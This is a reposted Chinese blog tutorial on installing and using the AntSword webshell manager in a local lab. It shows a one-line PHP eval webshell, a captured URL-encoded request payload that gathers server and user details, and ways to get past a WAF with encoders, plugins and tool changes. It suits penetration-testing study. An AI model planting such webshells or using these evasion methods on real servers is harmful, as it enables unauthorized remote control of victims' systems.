返回顶部
首页 > 资讯 > 服务器 >中国蚁剑安装使用教程
  • 653
分享到

中国蚁剑安装使用教程

php服务器开发语言安全 2023-08-31 06:08:24 653人浏览 安东尼
摘要

中国蚁剑安装使用教程 前言一、中国蚁剑安装二、中国蚁剑使用2.1中国蚁剑连接木马2.2中国蚁剑设置代理2.3中国蚁剑参数设置2.4中国蚁剑其他使用 三、 中国蚁剑绕过Waf3.1 编

中国蚁剑安装使用教程


大家好,我是the-back-zoom,如下是中国蚁剑安装使用教程,拒绝水文,从我做起

前言


中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

一、中国蚁剑安装

中国蚁剑安装教程_ccc123ccccc的博客-CSDN博客_rab3it

中国蚁剑的安装直接看这个人写的博客,安装不难,所以我直接讲中国蚁剑的使用

二、中国蚁剑使用

2.1中国蚁剑连接木马

我的服务器地址是192.168.93.129(本地服务器),所以我在根目录下面创建了muma.PHP文件,文件中的内容如下所示:

php @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

在这里插入图片描述

  1. url填写Http://192.168.93.129/muma.php

在这里插入图片描述

如上所示,点击测试连接,可以查看是否能够连接成功,点击添加就可以进行如下操作下:

在这里插入图片描述

2.2中国蚁剑设置代理

  1. 首先点击设置

在这里插入图片描述

  1. 进行相应的配置

在这里插入图片描述
在这里插入图片描述

  1. 配置正确点击测试连接就可以进行抓包

    点击正上方的测试连接

在这里插入图片描述

2.3中国蚁剑参数设置

如下所示,是http包的相应的参数

POST /muma.php HTTP/1.1Host: 192.168.93.129:80Accept-Encoding: gzip, deflateUser-Agent: antSWord/v2.1Content-Type: application/x-www-fORM-urlencodedContent-Length: 983Connection: close1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2230618%22%3Becho%20%40asenc(%24output)%3Becho%20%227a2d1%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

如上所示,如果需要添加请求行的参数,或者是POST传递的参数,该如何搞了:

在这里插入图片描述

在添加数据下有请求信息配置,如何配置如上所示:如下是其他配置:

在这里插入图片描述

2.4中国蚁剑其他使用

在这里插入图片描述

三、 中国蚁剑绕过Waf

3.1 编码绕过WAF

在这里插入图片描述

设置不同的编码器和解码器可以绕过waf,如下所示:

我的服务器地址是192.168.93.134(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:

 @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

在这里插入图片描述

  1. url填写http://192.168.93.134/muma.php,然后点击测试连接,连接成功(没有开启安全狗)

在这里插入图片描述

开启安全狗连接失败,更改为base64编码器,又连接成功,如下所示:

  • 开启安全狗

在这里插入图片描述

基本上开启了waf,你就很难进行连接了,触发waf版本很老

3.2插件绕过waf

在这里插入图片描述

如上所示,点击插件市场,进行插件下载

在这里插入图片描述

由于shell不断在跟新,waf也在跟新,下载什么插件绕过只能够自己尝试

3.3 修改蚁剑绕过WAF

如下文章,是比较好的绕过waf的手段

蚁剑改造过WAF系列(一) - 0DayBug - 博客园 (cnblogs.com)

总结

如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF

来源地址:https://blog.csdn.net/qq_53568983/article/details/129782649

--结束END--

本文标题: 中国蚁剑安装使用教程

本文链接: https://lsjlt.com/news/384317.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • 中国蚁剑安装使用教程
    中国蚁剑安装使用教程 前言一、中国蚁剑安装二、中国蚁剑使用2.1中国蚁剑连接木马2.2中国蚁剑设置代理2.3中国蚁剑参数设置2.4中国蚁剑其他使用 三、 中国蚁剑绕过Waf3.1 编...
    99+
    2023-08-31
    php 服务器 开发语言 安全
  • 【webshell工具——蚁剑】蚁剑安装使用教程
    前言 本篇内容主要为webshell工具蚁剑的安装以及使用,本人也通过查询较多的文章,进行了总结,由于是第一次接触,有些地方可能存在问题,欢迎评论区留言。 [步骤1] 蚁剑工具的下载 废话不多说直接放...
    99+
    2023-08-31
    php
  • Qt6安装教程(使用国内源)
    为什么离线包没了? Qt6开始非商业授权下,不再提供离线安装方式的exe,但源码安装费时费力,所以推荐安装方式已经为在线组件安装方式,包括vs2022、Qt在线安装工具已经成为开发工...
    99+
    2023-02-15
    QT6安装
  • mac charles 安装教程、使用教程
    安装教程 1、mac版本的charles安装包下载 mac最新版本charles安装包dmg-其它文档类资源-CSDN下载 2、安装charles证书并进信任  mac上下载并安装证书 Help->SSL Proxying-> Instal...
    99+
    2023-09-25
    macos 测试工具 小程序
  • Navicat使用教程及安装教程
    Navicat是一个广泛使用的数据库管理工具,可用于管理多种数据库系统,如MySQL、MariaDB、Oracle等。它提供了丰富的功能,使得管理数据库变得更加容易和高效。安装Navicat十分简单,只需下载安装包并按照向导进行操作即可。在...
    99+
    2023-08-16
    数据库 mysql
  • nvm安装使用教程
    文章目录 下载配置安装最新稳定版 node安装指定版本查看版本切换版本删除版本 常见问题安装node后 显示拒绝访问的问题使用cnpm会报错的问题降低cnpm版本npm镜像 下载 NVM for Windows 下...
    99+
    2023-08-30
    前端
  • Xshell安装使用教程
    简介 Xshell 是一个强大的安全终端模拟软件,它支持SSH1, SSH2, 以及Microsoft Windows 平台的TELNET 协议。Xshell 通过互联网到远程主机的安全连接以及它创新性的设计和特色帮助用户在复杂的网络环境中...
    99+
    2023-09-01
    服务器 运维 Xshell 免费版安装
  • Gitblit使用安装使用教程
    Gitblit是什么     Gitblit 是一个纯 Java 库用来管理、查看和处理 Git 资料库.相当于 Git 的 Java 管理工具.git的管家,通俗点来说就是一个相当于SVN的工具,用于多个人共同开发同一个项目,共用资源的目...
    99+
    2023-09-25
    git 服务器 java
  • mysql 8.0.12 安装使用教程
    记录了mysql 8.0.12 安装使用教程,供大家参考 Windows 首先从官网下载压缩包; 在安装目录解压缩; 进入压缩目录,在目录下新建my.ini,配置内容如下; [mysqld] # 设置3...
    99+
    2024-04-02
  • dbeaver安装和使用教程
    文章目录 一、简介二、安装教程三、使用教程1. 连接MySQL数据库2. 查看表数据3. 查看表属性3. SQL编辑器和控制台 一、简介 dbeaver是一款的数据库连接工具,免费,跨...
    99+
    2023-08-31
    mysql navicat 连接工具 dbeaver 使用教程
  • Charles安装及使用教程
    一. 简介及安装 一、charles的使用 1  charles的说明 Charles其实是一款代理服务器,通过过将自己设置成系统(电脑或者浏览器)的网络访问代理服务器,然后截取请求和请求结果达到分析抓包的目的。该软件是用Java写的,能够...
    99+
    2023-09-02
    linux 网络 java charles
  • sonar安装及使用教程
    Sonar是一个代码质量管理平台,用于分析和管理代码的质量。它可以帮助开发团队发现和解决代码中的潜在问题,提高代码的可读性和可维护性...
    99+
    2023-09-17
    sonar
  • CocoaPods安装和使用教程
    CocoaPods是一个用于管理iOS项目中第三方库的工具。下面是CocoaPods的安装和使用教程:1. 安装CocoaPods-...
    99+
    2023-08-23
    CocoaPods
  • Deepin中安装与使用virtualenv的教程
    virtualenv是一个用来创建隔离的python虚拟环境的工具。它可以在一个独立的目录创建自己的python环境,使用virtualenv运行的程序,并不会访问全局的python环境,也不会访问不属于自己目录的pyt...
    99+
    2022-06-04
    Deepin 安装 virtualenv Deepin 使用 virtualenv
  • Mac中pyenv的安装与使用教程
    目录前言一、pyenv1、安装方式一:Git Clone方式二:Homebrew2、验证3、使用二、virtualenv插件1、安装方式一:Git Clone方式二:Homebrew...
    99+
    2024-04-02
  • Navicat for SQLite安装使用教程 附安装包
    Navicat for SQLite安装教程+安装包 百度网盘下载: 链接: https://pan.baidu.com/s/1o5OprZ18eEnKbbl5jMhWOQ 提取码:...
    99+
    2024-04-02
  • CocoaPods1.9.0 安装使用教程详解
    CocoaPods是什么 CocoaPods是OS X和iOS下的一个第三类库管理工具,通过CocoaPods工具我们可以为项目添加被称为“Pods”的依赖库(这些类库必须是Coco...
    99+
    2022-05-27
    CocoaPods1.9.0 安装 使用
  • mysql-atlas安装及使用教程
    Atlas是由 Qihoo 360公司Web平台部基础架构团队开发维护的一个基于MySQL协议的数据中间层项目。它在MySQL官方推出的MySQL-Proxy 0.8.2版本的基础上,修改了大量bug,添加...
    99+
    2024-04-02
  • R.swift的使用与安装教程
    为什么使用R.swift R.swift可以获取强类型、自动完成的资源,如图像、字体和段落完全类型化。更少的强制转换和猜测方法将返回什么编译时检查,运行时不再有导致应用程序崩溃的错误...
    99+
    2024-04-02
  • Jupyter Notebook 安装与使用教程
    一、什么是Jupyter Notebook? 1. 简介        Jupyter Notebook是基于网页的用于交互计算的应用程序。其可被应用于全过程计算:开发、文档编写、运行代码和展示结果。——Jupyter Notebook官方...
    99+
    2023-09-20
    jupyter python ide
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作